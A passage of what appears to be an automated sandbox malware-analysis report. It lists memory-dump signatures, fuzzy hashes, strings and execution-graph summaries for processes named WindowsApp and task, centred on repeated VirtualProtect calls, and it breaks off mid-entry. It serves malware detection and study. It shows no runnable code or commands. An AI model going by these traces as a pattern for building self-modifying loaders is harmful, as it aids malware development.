                                                      • Snapshot File: hcaresult_7_2_7ffaac4c6000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: x
                                                      • API String ID: 0-2216521381
                                                      • Opcode ID: 9d17df742d3575bf7b4941b1db2366a1ffafcf5f3ef6e55d4c5dc1404db13c56
                                                      • Instruction ID: 6f14f4880c7a1878b50493dd2f6db5efc1b2759cbf20ba42554f6702a979cb81
                                                      • Opcode Fuzzy Hash: 9d17df742d3575bf7b4941b1db2366a1ffafcf5f3ef6e55d4c5dc1404db13c56
                                                      • Instruction Fuzzy Hash: A8F01C71D1891B8FF7E4EB28CC5A7E9A6A2FF58200F4084F9904DD2592DE345EC58B80
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8b7ded2d43819e80e96ab813c61141c5b7c18ed9a1e69314831b3e1428043694
                                                      • Instruction ID: 91c71b4a08b9ce4eef780d049131e518d1c00ee5c88f893126584b474fd67783
                                                      • Opcode Fuzzy Hash: 8b7ded2d43819e80e96ab813c61141c5b7c18ed9a1e69314831b3e1428043694
                                                      • Instruction Fuzzy Hash: 5EB17C7190D7D98FEB56DB3488647A47FB0AF17304F0A40EBC488DB1A3DA345A89CB52
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c0000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a37a1d779378ebbb8874766cbbac1c4a5921911eb9678141800ecb31b7f875db
                                                      • Instruction ID: 64485e156e3ac0a0d685c36d67ba98123535ee1b49a7b51c29d5609f543986d4
                                                      • Opcode Fuzzy Hash: a37a1d779378ebbb8874766cbbac1c4a5921911eb9678141800ecb31b7f875db
                                                      • Instruction Fuzzy Hash: 6B41D57180E7C98FF7278B2898A52E53FA0AF43308F0941BBD4898F1A3DD285559C795
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C2000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c2000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: df5363e339e2ec3be9baa145576007d741eb24dc3f61dccf61deedd7b4ab4b04
                                                      • Instruction ID: c08993a7028bbc879269a4ecf2e05b892f80150f23fc16cafd1626d81d660486
                                                      • Opcode Fuzzy Hash: df5363e339e2ec3be9baa145576007d741eb24dc3f61dccf61deedd7b4ab4b04
                                                      • Instruction Fuzzy Hash: 1E0100B290D68A8FE7B5EF68C8447F83781FF4A304F0084B9C40D8B296DD78A8499384
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C2000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c2000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 442b2fc52093fa5cb302472210339b6fed323d98a1098cedfdd08fa35726b4c2
                                                      • Instruction ID: f4abbdb23814c0331d90da7a94eed2ecfdfb5e4788d433a6e66114504bcdcc9e
                                                      • Opcode Fuzzy Hash: 442b2fc52093fa5cb302472210339b6fed323d98a1098cedfdd08fa35726b4c2
                                                      • Instruction Fuzzy Hash: B9E08C7041E244CBEBBEDF01C851BE83698EB00308F10A02ED90E4A290DB3893048B98
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c6000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97c256d016cc8b16d40fb23455df81a87d779b90347c28252b4324d7132807ab
                                                      • Instruction ID: 80519e15799200b636bdf5292304f1dae48d83cf0ac7e333727b3f6daa1ac9d7
                                                      • Opcode Fuzzy Hash: 97c256d016cc8b16d40fb23455df81a87d779b90347c28252b4324d7132807ab
                                                      • Instruction Fuzzy Hash: 6CD012309191098FF71DEF64C0428DC7731FB45618F30666DD04B662A2D935A9058A88
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4c0000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7606a0fc62e4e54d8f335c09ac0a4515144289118147727eb48096dbbd6e281a
                                                      • Instruction ID: 0a880604c8904fa9e2819539826a57fc054a1b4e4501e4b9aaae843c44c12088
                                                      • Opcode Fuzzy Hash: 7606a0fc62e4e54d8f335c09ac0a4515144289118147727eb48096dbbd6e281a
                                                      • Instruction Fuzzy Hash: 98C09B3041D34787E77EDF1485577A4765DF705D08F30A01D998B0D1754A305311DA95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4CB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4CB000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4cb000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,6l
                                                      • API String ID: 0-2998287610
                                                      • Opcode ID: 42d0a9ac9d1cc30ed5179564744a6e8662fee7f5bc253daed3ef27d8df687b8c
                                                      • Instruction ID: e40746a747a07808261cbf21ca7779194001503b8b9c2038a58705b17980dffb
                                                      • Opcode Fuzzy Hash: 42d0a9ac9d1cc30ed5179564744a6e8662fee7f5bc253daed3ef27d8df687b8c
                                                      • Instruction Fuzzy Hash: AB51287290E3854FE31E96395C5A5A17FA5DB8322070982FFD4C6CB1E7E9199C0B83D1
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1f8d815b8dcc8272b34c3e6186c0e5ccb7badf4b5f48917591a62c536fa8a9bc
                                                      • Instruction ID: 10eff803e1f83990e6f073a8109218d326116832d7e683cff3bf98435f15f2df
                                                      • Opcode Fuzzy Hash: 1f8d815b8dcc8272b34c3e6186c0e5ccb7badf4b5f48917591a62c536fa8a9bc
                                                      • Instruction Fuzzy Hash: B8224F70918A8D8FEBB9EF28C859BE977E1FB59301F00412ED84ECB291DE749544CB81
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cf444071cfa23413777e7a9679e85b2fb30b68f6c46106784db9fb35022dd550
                                                      • Instruction ID: 104d23045aa1a20d2fd067ed641296304765780212567082eaeb40e5a5503f0c
                                                      • Opcode Fuzzy Hash: cf444071cfa23413777e7a9679e85b2fb30b68f6c46106784db9fb35022dd550
                                                      • Instruction Fuzzy Hash: B6918F6190F3C19FE30B5B3458656B1BFE4EF53214B1A82EFE089861A3C918980AC3D6
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2434365853.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ffaac4d4000_WindowsApp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2ea3b3c610935d4378413fe69836527e30f54b48be3abef1c2a998a933e86773
                                                      • Instruction ID: 7284ea6f3766976053251706102f04054e9c7d20f565622b92a3a3f119fe3e6f
                                                      • Opcode Fuzzy Hash: 2ea3b3c610935d4378413fe69836527e30f54b48be3abef1c2a998a933e86773
                                                      • Instruction Fuzzy Hash: E2414E7260C60D4FE71CDB68D84B5FA77D6EB86320B10423ED44FC3192EA20A81782C9

                                                      Execution Graph

                                                      Execution Coverage: 18.9%
                                                      Dynamic/Decrypted Code Coverage: 100%
                                                      Signature Coverage: 0%
                                                      Total number of Nodes: 39
                                                      Total number of Limit Nodes: 3
                                                      execution_graph 901 7ffaac4b06f5 902 7ffaac4b070d VirtualProtect 901->902 904 7ffaac4bbe29 902->904 940 7ffaac4b09f8 943 7ffaac4b0570 940->943 942 7ffaac4b0a17 944 7ffaac4b0579 943->944 945 7ffaac4b5c59 VirtualProtect 944->945 947 7ffaac4b05ce 944->947 946 7ffaac4b5cf9 945->946 946->942 947->942 947->947 905 7ffaac4b17e6 908 7ffaac4b0510 905->908 907 7ffaac4b17eb 909 7ffaac4b0515 908->909 910 7ffaac4b5c59 VirtualProtect 909->910 912 7ffaac4b05ce 909->912 911 7ffaac4b5cf9 910->911 911->907 912->907 912->912 913 7ffaac4b0837 915 7ffaac4b083f 913->915 914 7ffaac4b07ce 915->914 918 7ffaac4b0500 915->918 917 7ffaac4b08d3 919 7ffaac4b0505 918->919 920 7ffaac4b5c59 VirtualProtect 919->920 922 7ffaac4b05ce 919->922 921 7ffaac4b5cf9 920->921 921->917 922->917 922->922 935 7ffaac4b04bd 936 7ffaac4b04c5 935->936 937 7ffaac4b5c59 VirtualProtect 936->937 939 7ffaac4b05ce 936->939 938 7ffaac4b5cf9 937->938 939->939 948 7ffaac4b045b 949 7ffaac4b045f 948->949 950 7ffaac4b05ce 949->950 951 7ffaac4b5c59 VirtualProtect 949->951 952 7ffaac4b5cf9 951->952 931 7ffaac4b5b21 932 7ffaac4b5bbe VirtualProtect 931->932 934 7ffaac4b5cf9 932->934

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1402816447.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_7ffaac4b0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?N_^
                                                      • API String ID: 0-1123592777
                                                      • Opcode ID: 83b38461a67910df5c9caea3c323d5a0736b341ffefad1585f36cebea5f76be5
                                                      • Instruction ID: 24d68762c39801dfeb4801c9df915758b74007440714739d7635d03af0ca9290
                                                      • Opcode Fuzzy Hash: 83b38461a67910df5c9caea3c323d5a0736b341ffefad1585f36cebea5f76be5
                                                      • Instruction Fuzzy Hash: 37B14F71A0C7898FEB14DB68D8556FDBFB0FF56325F0482BAD049D7282DA30A845CB81

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1402816447.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_7ffaac4b0000_task.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: =N_^
                                                      • API String ID: 544645111-3908133570
                                                      • Opcode ID: 5f3480de5d0726b14cb5560605e1c412508ba24ce557a7ce29cbb220d5d761ef
                                                      • Instruction ID: 7da042c05f88d5c34af8da5bfa84d4c49184bc99e28072ba38a925a69667329c
                                                      • Opcode Fuzzy Hash: 5f3480de5d0726b14cb5560605e1c412508ba24ce557a7ce29cbb220d5d761ef
                                                      • Instruction Fuzzy Hash: 1BB18C70D0865C8FDB55DF68D849BE9BBF0FF5A314F0042AAD409D7292DB34A984CB85

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1402816447.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_7ffaac4b0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?N_^
                                                      • API String ID: 0-1123592777
                                                      • Opcode ID: 14873b95c5922f5e0b814aa896f9d95540f1a889b861991a112770e6e1ed71a5
                                                      • Instruction ID: d43de4ca0cc67ad262c0e53cc3982101ef4e0662c5b706c1faf84e7c24a58bb3
                                                      • Opcode Fuzzy Hash: 14873b95c5922f5e0b814aa896f9d95540f1a889b861991a112770e6e1ed71a5
                                                      • Instruction Fuzzy Hash: C8812071A0CA5D8FEB54EB5CD8956E9BFF0FF56325F04417AC089D3252DA20A845CB81

                                                      Control-flow Graph

                                                      control_flow_graph 96 7ffaac4b5b21-7ffaac4b5bbc 97 7ffaac4b5bc1-7ffaac4b5bd1 96->97 98 7ffaac4b5bbe-7ffaac4b5bc0 96->98 99 7ffaac4b5bd4-7ffaac4b5cf7 VirtualProtect 97->99 100 7ffaac4b5bd3 97->100 98->97 104 7ffaac4b5cf9 99->104 105 7ffaac4b5cff-7ffaac4b5d4d 99->105 100->99 104->105
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1402816447.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_7ffaac4b0000_task.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: ff7b6786057229d707c55daf00ee7e7119f27f56e1462a02c8a85ccccd3da570
                                                      • Instruction ID: 8700e9895a07ccb1e74ca12cc25e4970c5817209ca1c238966f2a9b6750490d9
                                                      • Opcode Fuzzy Hash: ff7b6786057229d707c55daf00ee7e7119f27f56e1462a02c8a85ccccd3da570
                                                      • Instruction Fuzzy Hash: EA819D7080D7888FDB06DF688865AE9BFB0EF17305F1541EFC089D7293DA64A945CB52

                                                      Control-flow Graph

                                                      control_flow_graph 107 7ffaac4b0500-7ffaac4b0541 112 7ffaac4b0582 107->112 113 7ffaac4b0543-7ffaac4b057f 107->113 115 7ffaac4b0584-7ffaac4b5cf7 VirtualProtect 112->115 116 7ffaac4b05ce-7ffaac4b793d 112->116 113->112 130 7ffaac4b5cf9 115->130 131 7ffaac4b5cff-7ffaac4b5d4d 115->131 122 7ffaac4b7944-7ffaac4b794e 116->122 123 7ffaac4b793f 116->123 125 7ffaac4b7954-7ffaac4b797a 122->125 126 7ffaac4b7a22-7ffaac4b7a2a 122->126 123->122 128 7ffaac4b7997-7ffaac4b7998 125->128 129 7ffaac4b797c-7ffaac4b7993 125->129 128->126 133 7ffaac4b7995 129->133 130->131 133->133
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1402816447.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_7ffaac4b0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7863885df780f3b15bb8a033c226912a12788c55c2e95da644b1293911d4b7c7
                                                      • Instruction ID: 7e28a6b761d6ef2257d2a7447bebaf084d630a8876fafbd4d1f595bf37856f78
                                                      • Opcode Fuzzy Hash: 7863885df780f3b15bb8a033c226912a12788c55c2e95da644b1293911d4b7c7
                                                      • Instruction Fuzzy Hash: D271CD71A0CB5D8FEB54DF58D899AE9BFF0FB56315F0042AAC049D7252DB30A885CB81

                                                      Control-flow Graph

                                                      control_flow_graph 134 7ffaac4b0510-7ffaac4b0541 138 7ffaac4b0582 134->138 139 7ffaac4b0543-7ffaac4b057f 134->139 141 7ffaac4b0584-7ffaac4b5cf7 VirtualProtect 138->141 142 7ffaac4b05ce-7ffaac4b793d 138->142 139->138 156 7ffaac4b5cf9 141->156 157 7ffaac4b5cff-7ffaac4b5d4d 141->157 148 7ffaac4b7944-7ffaac4b794e 142->148 149 7ffaac4b793f 142->149 151 7ffaac4b7954-7ffaac4b797a 148->151 152 7ffaac4b7a22-7ffaac4b7a2a 148->152 149->148 154 7ffaac4b7997-7ffaac4b7998 151->154 155 7ffaac4b797c-7ffaac4b7993 151->155 154->152 159 7ffaac4b7995 155->159 156->157 159->159
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1402816447.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_7ffaac4b0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4a07b933046cccdc8ffe34b9e3cee8a669fd7b35c14a224f19cabc0b8946bf7b
                                                      • Instruction ID: 89b929dd66045b1b205e525009020a84b66f9128b70c81649891d4a1fe7ad1b4
                                                      • Opcode Fuzzy Hash: 4a07b933046cccdc8ffe34b9e3cee8a669fd7b35c14a224f19cabc0b8946bf7b
                                                      • Instruction Fuzzy Hash: 4D61DD7190CB5D8FEB54DF58D899AE9BFF0FB56315F0042AAC049D7252DB30A885CB81

                                                      Control-flow Graph

                                                      control_flow_graph 160 7ffaac4b0550-7ffaac4b0582 165 7ffaac4b0584-7ffaac4b5cf7 VirtualProtect 160->165 166 7ffaac4b05ce-7ffaac4b793d 160->166 178 7ffaac4b5cf9 165->178 179 7ffaac4b5cff-7ffaac4b5d4d 165->179 170 7ffaac4b7944-7ffaac4b794e 166->170 171 7ffaac4b793f 166->171 173 7ffaac4b7954-7ffaac4b797a 170->173 174 7ffaac4b7a22-7ffaac4b7a2a 170->174 171->170 176 7ffaac4b7997-7ffaac4b7998 173->176 177 7ffaac4b797c-7ffaac4b7993 173->177 176->174 181 7ffaac4b7995 177->181 178->179 181->181
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1402816447.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_7ffaac4b0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a619fcccc49efc5d304b3604dd23ba914ee60437a735ef43a875f70d50b31695
                                                      • Instruction ID: 1133b5e55883d50db39773b306a892c4942a3ad535da49521144dc9b33d8ce84
                                                      • Opcode Fuzzy Hash: a619fcccc49efc5d304b3604dd23ba914ee60437a735ef43a875f70d50b31695
                                                      • Instruction Fuzzy Hash: D7516D7090864C8FDB54DF58D895BEDBBF0FB59315F10426ED04AE3252DB30A985CB85

                                                      Control-flow Graph

                                                      [control-flow graph rendering omitted; the only API called from the graphed blocks is VirtualProtect]
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.1402816447.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_7ffaac4b0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70bddcf552aa13497c074f4f0a0a8b69a84c580f40e83231ce0f3120c72d50c7
                                                      • Instruction ID: 3d95dff265a1036839914357c53826c23fc010b104cad5b6cfd6fef16cb352af
                                                      • Opcode Fuzzy Hash: 70bddcf552aa13497c074f4f0a0a8b69a84c580f40e83231ce0f3120c72d50c7
                                                      • Instruction Fuzzy Hash: 75516C74908A0C8FDB58DF58D889BEDBBF1FB69315F10426ED04AE3251DB30A985CB85

                                                      Execution Graph

                                                      Execution Coverage:20.1%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:42
                                                      Total number of Limit Nodes:6
                                                      [execution graph rendering omitted; the only API called from the graphed nodes is VirtualProtect]

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1472827189.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ffaac4a0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?O_^
                                                      • API String ID: 0-1127923838
                                                      • Opcode ID: ad39946db0466e60089ac7d5b6a2b330766023a67ca66a07084b2b696a2546e1
                                                      • Instruction ID: 34c26bea3800ab36a6274ea5707dafed8c3b4732fbdf4eaae4834c21e7ee08fd
                                                      • Opcode Fuzzy Hash: ad39946db0466e60089ac7d5b6a2b330766023a67ca66a07084b2b696a2546e1
                                                      • Instruction Fuzzy Hash: 89B12071A0C7498FEB14DF68D8546E9BBB0FF56325F0441BAC04AD7292DA30A889CB95

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1472827189.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ffaac4a0000_task.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID: =O_^
                                                      • API String ID: 544645111-3912435957
                                                      • Opcode ID: 2389566781486c36ab0677b4dcdadb1a4ccf7b687e232de1aa81420d62b06d92
                                                      • Instruction ID: 83ea771232036642677052a8b53c618ab153d81fdc7aedafff46a04797de189c
                                                      • Opcode Fuzzy Hash: 2389566781486c36ab0677b4dcdadb1a4ccf7b687e232de1aa81420d62b06d92
                                                      • Instruction Fuzzy Hash: 8EB17B7091875C8FDB54DF68D849BE9BBF0FF5A314F0042AAD409E7292DB34A984CB85

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1472827189.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ffaac4a0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ?O_^
                                                      • API String ID: 0-1127923838
                                                      • Opcode ID: 654093a7b1525cef49dc47130e43bd59cdebbcf079023b7ee44aecf412a7590a
                                                      • Instruction ID: df099566390784b34103c320af6ef4b887964078e24a891bfb409cf79ea4791e
                                                      • Opcode Fuzzy Hash: 654093a7b1525cef49dc47130e43bd59cdebbcf079023b7ee44aecf412a7590a
                                                      • Instruction Fuzzy Hash: 8981FF71A08B4D8FEB54EF5CD8956E8BBF0FF56325F04427AC049D7252DA30A886CB91

                                                      Control-flow Graph

                                                      [control-flow graph rendering omitted; the only API called from the graphed blocks is VirtualProtect]
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1472827189.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ffaac4a0000_task.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: b23543d8ef4fb8019672d24342f9c678e630eb96e77e725c2a63e13c66fa3cf9
                                                      • Instruction ID: 6d838c499c2674e018c6fbb2574da1ed6f36f74f8a234e2b121706ead9f39188
                                                      • Opcode Fuzzy Hash: b23543d8ef4fb8019672d24342f9c678e630eb96e77e725c2a63e13c66fa3cf9
                                                      • Instruction Fuzzy Hash: 26817B7080D7888FDB06DF688865AE9BFB0EF17305F1541EBC089DB293D664A946CB52

                                                      Control-flow Graph

                                                      [control-flow graph rendering omitted; the only API called from the graphed blocks is VirtualProtect]
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1472827189.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ffaac4a0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e74a27a0499540d08ad0051cd6c414bbadb2514d3e5baf77a82797ee9ab9e01
                                                      • Instruction ID: 2611fcb1eac01ecde1b1862dd49139828acf51a0ff782fe84ecd59480aa77b83
                                                      • Opcode Fuzzy Hash: 5e74a27a0499540d08ad0051cd6c414bbadb2514d3e5baf77a82797ee9ab9e01
                                                      • Instruction Fuzzy Hash: C271BD71A0CB4D8FEB54DF58D8996E9BBF0FB56315F0042BAC04AD7252DB30A885CB85

                                                      Control-flow Graph

                                                      [control-flow graph rendering omitted; the only API called from the graphed blocks is VirtualProtect]
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1472827189.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ffaac4a0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e35118cc9f153c4832169a68ba3e7ab2005e6c3437a4e181af8b53d77668459e
                                                      • Instruction ID: 554b0d13f1213707ecad01c66c0c8545f8fcdbd0c4c319c53492d34962ed68eb
                                                      • Opcode Fuzzy Hash: e35118cc9f153c4832169a68ba3e7ab2005e6c3437a4e181af8b53d77668459e
                                                      • Instruction Fuzzy Hash: 4361CD7190CB4DCFEB54DF58D899AE9BBF0FB56315F0042AAC04AD7252DB30A885CB85

                                                      Control-flow Graph

                                                      [control-flow graph rendering omitted; the only API called from the graphed blocks is VirtualProtect]
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1472827189.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ffaac4a0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd306b4ed286522e52ff77fec2584788df86789d0a73d3858a8cb854c94eb038
                                                      • Instruction ID: a78d922926582e388c9020cb8f7bd0e335adbc4fb326c6865fd7956e73e21806
                                                      • Opcode Fuzzy Hash: bd306b4ed286522e52ff77fec2584788df86789d0a73d3858a8cb854c94eb038
                                                      • Instruction Fuzzy Hash: 0D516C70908B4C8FEB54DF58D889AEDBBF0FB59315F1042AED04AE7251DB30A985CB85

                                                      Control-flow Graph

                                                      [control-flow graph rendering omitted; the only API called from the graphed blocks is VirtualProtect]
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1472827189.00007FFAAC4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_7ffaac4a0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1ffcbbb45f692e40219e138146dacbfaa35b9b279272693922fdc23c4a5b9b15
                                                      • Instruction ID: 3b9f59abecf88661e5ebcf3145cb6fcb493f7d82d4807926346e1b97d9801881
                                                      • Opcode Fuzzy Hash: 1ffcbbb45f692e40219e138146dacbfaa35b9b279272693922fdc23c4a5b9b15
                                                      • Instruction Fuzzy Hash: 49514974908A0C8FDB58DF58D889BEDBBF1FB69315F10426ED04AE3251DB30A985CB85

                                                      Execution Graph

                                                      Execution Coverage:17.9%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:3
                                                      Total number of Limit Nodes:0
                                                      [execution graph rendering omitted; the only API called from the graphed nodes is VirtualProtect]

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000F.00000002.1523959912.00007FFAAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_15_2_7ffaac4d0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: =L_^
                                                      • API String ID: 0-3950360236
                                                      • Opcode ID: 23db8d1d6e925cd72f4eea40f905e4c5d1d3e4eaedde78dd75652a6a282e2ba7
                                                      • Instruction ID: 6e236d53424bb07c4eb33d031cff96e59c6c62577f55c355879f340fbab7d4d6
